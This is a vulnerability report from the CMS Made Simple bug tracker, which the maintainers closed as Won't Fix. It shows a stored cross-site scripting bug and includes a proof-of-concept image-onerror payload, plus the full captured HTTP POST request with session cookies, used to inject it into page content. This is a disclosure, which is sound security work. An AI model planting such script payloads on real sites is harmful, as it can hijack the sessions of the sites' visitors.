CMS Made Simple - Forge CMS Made Simple Core

Back to List

[#12392] Stored Cross-Site Scripting - CMS Made Simple 2.2.15

Created By: Vu Tien Hoa (hoavt)

Date Submitted: Fri Dec 04 02:36:46 -0500 2020

Assigned To:

Version: 2.1.5

CMSMS Version: 2.1.5

Severity: Minor

Resolution: Won't Fix

State: Open

Summary:

Stored Cross-Site Scripting - CMS Made Simple 2.2.15

Detailed Description:

#Description
A user has the permission to edit content (Editor or Designer) with javascript
embedded in the content. When any user accesses the page, the javascript code
will execute

#PoC
## Step 1: Go to Content Manager and edit content
## Step 2: Modify content_en with payload "<img src = x onerror = alert
(origin)>" and submit
POST /cmsms/admin/moduleinterface.php HTTP/1.1
Host: web-lab.pwn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web-lab.pwn/
Content-Type: multipart/form-data;
boundary=---------------------------72093799622205927352514468929
Content-Length: 4525
Origin: http://web-lab.pwn
Connection: close
Cookie:
e65594eeb39b9b448034fc3eee48fc815463b91a=9b293e574967f5dc78abea9174d5f4caf5159e14%3A%3AeyJ1aWQiOjMsInVzZXJuYW1lIjoiZWRpdG9yIiwiZWZmX3VpZCI6bnVsbCwiZWZmX3VzZXJuYW1lIjpudWxsLCJoYXNoIjoiJDJ5JDEwJExFM1NKTHF5bDR3emh2cHNcLzgxTVIuVUk4bU9tcEZNekJwUkU4dzc5Z1NlS3c0UGtqbExycSJ9;
__c=1a2e1c5b9a471aa9e58; fusionl9731_visited=yes;
CMSSESSIDac0680acaa0f=al5kq5mhtivpdjlchcutj7g1eo
Upgrade-Insecure-Requests: 1

-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="mact"

CMSContentManager,m1_,admin_editcontent,0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="__c"

1a2e1c5b9a471aa9e58
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_content_id"

35
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_active_tab"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_content_type"

content
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="title"

Demo
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="content_en"

<p>demo<img src="x" onerror=alert(origin) /></p>
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="menutext"

Demo
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="parent_id"

-1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="showinmenu"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="showinmenu"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="titleattribute"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="accesskey"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="tabindex"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="target"

---
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="metadata"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="pagedata"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="design_id"

2
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="template_id"

10
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="alias"

demo
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="active"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="active"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="secure"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="cachable"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="cachable"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="image"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="thumbnail"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="extra1"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="extra2"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="extra3"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="wantschildren"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="wantschildren"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="searchable"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="searchable"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="disable_wysiwyg"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="ownerid"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="additional_editors"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_submit"

Submit
-----------------------------72093799622205927352514468929--

## Step3: Go to page and trigger

History

Date: 2020-12-04 10:34
Posted By: Matt Hornsby (DIGI3) (DIGI3)

The admin section is for trusted users only. If you need a login system for
untrusted users, there are third-party modules available.

Please read
https://www.cmsmadesimple.org/community/get-involved/report-a-vulnerability for
more clarification on our position.

Updated: 2020-12-04 10:35
resolution_id: => 8

CMSMS | CMS Made Simple

CMS MADE SIMPLE FORGE

CMS Made Simple Core

[#12392] Stored Cross-Site Scripting - CMS Made Simple 2.2.15

History